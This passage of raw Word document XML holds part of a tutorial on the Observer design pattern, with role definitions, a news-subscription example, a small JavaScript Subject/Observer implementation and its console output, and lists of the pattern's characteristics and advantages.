          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Observer</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The object that wants to be informed about changes in the subject. It registers itself with the subject to receive updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10018D11" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="506"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Concrete Subject</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A specific implementation of the subject that maintains a list of observers and sends notifications when its state changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268D7163" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="506"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Concrete Observer</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A specific implementation of an observer that reacts to changes in the subject.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B439CE3" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How the Observer Pattern Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE6739B" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="507"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Observer Registration</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Observers register themselves with the subject to receive updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EDAB32" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="507"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>State Change</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: When the subject's state changes, it triggers a notification to all registered observers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CD6540" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="507"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Notification</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The subject loops through all observers and calls their update method, passing any relevant information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB1F1AF" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="507"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Observer Reaction</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Each observer reacts to the state change in the subject independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0191B193" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D561690" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">A common example of the Observer pattern is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>news subscription system</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>. In this scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAC7B0F" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="508"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Subject</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the News Agency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F9F791" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="508"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Observers</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> are the subscribers who want to be notified when new articles are published.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219B5F1A" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Basic Example in JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C22135B"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Subject (Publisher)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024D5238"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class Subject {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B57DEBF"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constructor() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25092C44"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this.observers = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF4063D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA054B0"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20DDA79A"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 Add an observer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7273733E"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subscribe(observer) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5219097C"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this.observers.push(observer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258DAC8B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472129CF"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5E4DD7D1"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 Remove an observer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5D6329"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unsubscribe(observer) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B20DDB"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this.observers = this.observers.filter(obs =&gt; obs !== observer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CA9566"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D25A39"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27DC1353"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 Notify all observers about an event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DE3018"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notify(data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E7D380"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this.observers.forEach(observer =&gt; observer.update(data));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A9939E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5290DE21"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA667A4"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7CE2B546"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Observer (Subscriber)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20512F33"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class Observer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658C793D"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constructor(name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5913FE76"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this.name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F15E4E2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FAA125"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6B04E9C5"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 The update method that will be called by the subject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368928E5"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update(data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F2BC9F"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console.log(`${this.name} received data: ${data}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693AFB06"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BCF82A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8914B5"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27EC5F76"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Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32170770"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newsAgency = new Subject();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388517CC"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64EECB38"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subscriber1 = new Observer("Subscriber 1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F70294"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const subscriber2 = new Observer("Subscriber 2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2ABC70"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748BD1E7"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newsAgency.subscribe(subscriber1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3300741E"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newsAgency.subscribe(subscriber2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33737DA3"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70A7AEC7"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Notify all subscribers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE8FCF4"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newsAgency.notify("Breaking News: New Observer pattern example!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643D15CC"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167A2860"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newsAgency.unsubscribe(subscriber1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676BA89D"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p>
    <w:p w14:paraId="283082A7"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Notify remaining subscribers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6810FE8E" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502"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newsAgency.notify("Another News: Unsubscribed Subscriber 1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F028F22" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DB7433" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA250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Subscriber 1 received data: Breaking News: New Observer pattern example!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E057B41" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA250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Subscriber 2 received data: Breaking News: New Observer pattern example!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43564554" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502"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Subscriber 2 received data: Another News: Unsubscribed Subscriber 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAE83C0" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Characteristics of the Observer Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45014D98" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="509"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Loose Coupling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The subject and observers are loosely coupled. The subject only knows that the observers implement a certain interface, but it doesn’t need to know any specifics about them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0A88D3" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="509"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Dynamic Relationships</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Observers can be added or removed at runtime, making the pattern very flexible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552FE0DD" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="509"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Broadcast Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A change in the subject is broadcasted to all interested observers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D272CD" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Advantages of the Observer Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8AE742" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="510"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Automatic Updates</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Observers are automatically updated when the subject’s state changes, ensuring data consistency across different parts of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D69F13" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="510"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Loose Coupling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The subject and observers are independent, which makes the system more flexible and easier to extend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA17C69" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="510"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Dynamic Subscription</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
